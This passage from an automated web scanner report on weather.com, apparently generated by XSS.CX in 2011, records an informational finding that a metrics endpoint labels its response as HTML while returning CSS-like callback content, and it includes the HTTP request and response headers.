Expires: Thu, 24 Mar 2011 17:41:53 GMT
Cache-Control: max-age=900
Content-Type: text/html;charset=UTF-8
Server: Apache
SVRNAME: wxii2x02
X-Cache-Hits: 1
X-Varnish: 2184439133 2184417570
X-Varnish-Hashed-On: yahoo
Vary: Accept-Encoding
Content-Length: 1241


    <ul class="twc-weather-locations" id="twc-weather-locations-id">
               
       
                                                                                                                           
...[SNIP]...
7.2. http://www.weather.com/pagelet/metrics/  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.weather.com
Path:   /pagelet/metrics/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /pagelet/metrics/?pageID=62287&modeID=default&cb=YAHOO.metrics.createMetrics HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1300987732569; fv=1

Response

HTTP/1.1 200 OK
Date: Thu, 24 Mar 2011 17:28:19 GMT
Expires: Thu, 24 Mar 2011 17:33:19 GMT
Cache-Control: max-age=300
Content-Type: text/html;charset=UTF-8
Server: Apache
SVRNAME: wxii2x02
X-Varnish: 2184480864
Vary: Accept-Encoding
Content-Length: 285


YAHOO.metrics.createMetrics({level1:"HOMEPAGE",
level2:"COMMON",
level3:"",
level4:"",
level5:"",
level6:"",
contentType:"",
detail:"",
title:"",
pagename:"/index.html",
ad_category:
...[SNIP]...
Report generated by XSS.CX at Thu Mar 24 12:46:13 CDT 2011.